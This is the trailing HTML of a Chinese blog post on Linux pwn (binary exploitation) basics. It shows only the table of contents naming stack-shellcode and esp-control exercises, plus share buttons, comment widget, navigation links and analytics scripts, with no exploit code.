class="toc-text">第五步,查找是否有系统调用字符串：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#第一题（堆栈直接执行shellcode）"><span class="toc-number">3.</span> <span class="toc-text">第一题（堆栈直接执行shellcode）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#第一步，查看保护"><span class="toc-number">3.1.</span> <span class="toc-text">第一步，查看保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二步，判断漏洞函数。"><span class="toc-number">3.2.</span> <span class="toc-text">第二步，判断漏洞函数。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第三步，计算目标变量的在堆栈中距离ebp的偏移"><span class="toc-number">3.3.</span> <span class="toc-text">第三步，计算目标变量的在堆栈中距离ebp的偏移</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第四步和第五步，分析是否已经载入了可以利用的函数，"><span class="toc-number">3.4.</span> <span class="toc-text">第四步和第五步，分析是否已经载入了可以利用的函数，</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#第二题（控制esp进行精准打击）"><span class="toc-number">4.</span> <span class="toc-text">第二题（控制esp进行精准打击）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#第一步：检测保护情况"><span class="toc-number">4.1.</span> <span class="toc-text">第一步：检测保护情况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二步，判断漏洞函数，"><span class="toc-number">4.2.</span> <span class="toc-text">第二步，判断漏洞函数，</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第三步，"><span class="toc-number">4.3.</span> <span class="toc-text">第三步，</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第四步和第五步："><span class="toc-number">4.4.</span> <span class="toc-text">第四步和第五步：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-number">5.</span> <span class="toc-text">总结</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide" title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"Linux pwn从入门到熟练（二）　| Gonglong Chen　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>






<!-- for valine comment-->

    <div id="comment"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
new Valine({
    el: '#comment' ,
    notify:false, 
    verify:false, 
    appId: '5ThDnxJ9xGDRyj5a8Kq8apby-gzGzoHsz',
    appKey: 'SmwcB7E7gWXRWaBth0Em9cV8',
    placeholder: 'Welcome to comments',
    avatar:'mm' 
});
</script>

    



    







    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/05/22/lora-error-packet-modify/" title="Pre: 修改某款lora固件库以支持接收错误数据包">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2018/11/18/linx-pwn-basic-rop/" title="Next: Linux PWN从入门到熟练">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/01/08/inforsec20-day2/">InforSec 2020 网络空间安全国际学术成果分享（上） Day Two</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/01/08/infosec-20/">InforSec 2020 网络空间安全国际学术成果分享（上） Day One</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/29/linux-pwn-basic-3/">Linux pwn从入门到熟练（三）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/22/lora-error-packet-modify/">修改某款lora固件库以支持接收错误数据包</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/24/linux-pwn-2/">Linux pwn从入门到熟练（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/18/linx-pwn-basic-rop/">Linux PWN从入门到熟练</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/03/cc2650-mqtt-client-example/">CC2650 launchpad + RPI + CC2650 sensor tag 构造MQTT控制蓝牙节点</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/01/fuzzer_simple_survey/">漏洞挖掘之乱拳打死老师傅——Fuzzer</a></li></ul>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">


        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2018-2020 Gonglong Chen
            </div>


            <div class="footer-right">

<!--
                <a href="http://hexo.io/" target="_blank" title="A fast, simple &amp; powerful blog framework">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="Another simple and elegant theme for Hexo  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
-->

<!-- hitwebcounter Code START 
<a href="http://www.hitwebcounter.com" target="_blank">
<img src="http://hitwebcounter.com/counter/counter.php?page=6974923&style=0025&nbdigits=5&type=page&initCount=0" title="website counter" Alt="website counter"   border="0" align="up" >
</a> 
-->

<a href="https://clustrmaps.com/site/1aae7" title="Visit tracker"><img src="//clustrmaps.com/map_v2.png?cl=ffffff&w=a&t=tt&d=_A6aIN1PIjxyWChOHfot_6QWJTyXak5ICsMT6_Cye6I&co=2d78ad&ct=ffffff"></a>


            </div>



        </div>





<!--
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        

-->

    </div>
</footer>


    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 3;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

<!--prettify代码高亮js引入-->

<script src="/plugins/prettify/prettify.js"></script>
<script type="text/javascript">
$(window).load(function(){
$('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
 prettyPrint();
})
</script>


<!--page counter part-->
<script>
function addCount (Counter) {
        url=$('.article-date').attr('href').trim();
    title = $('.article-title').text().trim();
    var query=new AV.Query(Counter);
    //use url as unique idnetfication
    query.equalTo("url",url);
    query.find({
        success: function(results){
            if(results.length>0)
            {
                var counter=results[0];
                counter.fetchWhenSave(true); //get recent result
                counter.increment("time");
                counter.save();
            }
            else
            {
                var newcounter=new Counter();
                newcounter.set("title",title);
                newcounter.set("url",url);
                newcounter.set("time",1);
                newcounter.save(null,{
                    success: function(newcounter){
                    //alert('New object created');
                    },
                    error: function(newcounter,error){
                    alert('Failed to create');
                    }
                    });
            }
        },
        error: function(error){
            //find null is not a error
            alert('Error:'+error.code+" "+error.message);
        }
    });
}
$(function(){
    var Counter=AV.Object.extend("Counter");
    //only increse visit counting when intering a page
    if ($('.article-title').length == 1)
       addCount(Counter);
    var query=new AV.Query(Counter);
    query.descending("time");
    // the sum of popular posts
    query.limit(10); 
    query.find({
        success: function(results){
                for(var i=0;i<results.length;i++)    
                {
                    var counter=results[i];
                    title=counter.get("title");
                    url=counter.get("url");
                    time=counter.get("time");
                    // add to the popularlist widget
                    showcontent=title+" ("+time+")";
                    //notice the "" in href
                    $('.popularlist').append('<li><a href="'+url+'">'+showcontent+'</a></li>');
                }
            },
        error: function(error){
            alert("Error:"+error.code+" "+error.message);
        }
        }
    )
    });</script>
  </div>
</body>
</html>